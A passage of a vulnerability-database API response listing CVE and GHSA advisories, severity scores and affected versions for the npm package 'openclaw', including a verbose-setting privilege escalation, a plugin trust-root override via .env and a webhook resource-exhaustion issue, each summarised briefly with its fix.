erability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"reso
urce_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["GHSA-gfmx-pph7-g46x"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4urc-4536-pqhk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90905?format=json","vulnerability_id":"VCID-5atj-2a7b-57g5","summary":"OpenClaw: Gateway `operator.write` can reach admin-only persisted `verboseLevel` via `chat.send` `/verbose`\n## Summary\n\nThe `chat.send` path let authorized write-scoped callers persist `/verbose` session overrides even though the same stored session mutation is admin-only through `sessions.patch`.\n\n## Impact\n\nA write-scoped gateway caller could persist verbose output for later runs and expose more reasoning or tool output than the operator intended.\n\n## Affected Component\n\n`src/auto-reply/reply/directive-handling.impl.ts, src/gateway/sessions-patch.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `c603123528` (`fix(gateway): require admin for persisted verbose 
defaults`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41344","reference_id":"","reference_type":"","scores":[{"value":"0.00086","scoring_system":"epss","scoring_elements":"0.24925","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00086","scoring_system":"epss","scoring_elements":"0.24857","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00086","scoring_system":"epss","scoring_elements":"0.24914","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41344"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c6031235288a8d3bdf2243bd974340d8c8045bc2","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/c6031235288a8d3bdf2243bd974340d8c8045bc2"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5h2w-qmfp-ggp6","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L
/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:02Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5h2w-qmfp-ggp6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41344","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41344"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-verbose-parameter","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:02Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-chat-send-verbose-parameter"},{"reference_url":"https://github.com/advisories/GHSA-5h2w-qmfp-ggp6","reference_id":"GHSA-5h2w-qmfp-ggp6","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5h2w-qmfp-ggp6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"
},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"
},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"
},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulner
ablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41344","GHSA-5h2w-qmfp-ggp6"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5atj-2a7b-57g5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89678?format=json","vulnerability_id":"VCID-5rgx-2krs-guck","summary":"OpenClaw: Workspace `.env` can override the bundled plugin trust root\n## Summary\nWorkspace `.env` can override the bundled plugin trust root\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: v2026.3.28 still lets a workspace `.env` override `OPENCLAW_BUNDLED_PLUGINS_DIR`, but a critical rating is too high: exploitation still depends on an attacker-controlled workspace being loaded, so this is not a universally reachable remote compromise.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `330a9f98cb29c79b1c16a2117e03d6276a0d6289` — 2026-03-31T19:25:12+09:00\n\nOpenClaw thanks @nexrin for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41396","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02663","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02716","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02711","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41396"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:16:36Z/"}],"url":"https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements"
:"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qcj9-wwgw-6gm8","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:16:36Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qcj9-wwgw-6gm8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41396","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41396"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-override-of-plugin-trust-root","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"C
VSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:16:36Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-override-of-plugin-trust-root"},{"reference_url":"https://github.com/advisories/GHSA-qcj9-wwgw-6gm8","reference_id":"GHSA-qcj9-wwgw-6gm8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qcj9-wwgw-6gm8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VC
ID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VC
ID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41396","GHSA-qcj9-wwgw-6gm8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5rgx-2krs-guck"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90967?format=json","vulnerability_id":"VCID-5s6h-u8x6-myfk","summary":"OpenClaw is vulnerable to unauthenticated resource exhaustion through its voice call webhook handling\n## Summary\nVoice Call webhook handling buffered request bodies before provider signature checks, enabling bounded unauthenticated resource exhaustion.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- 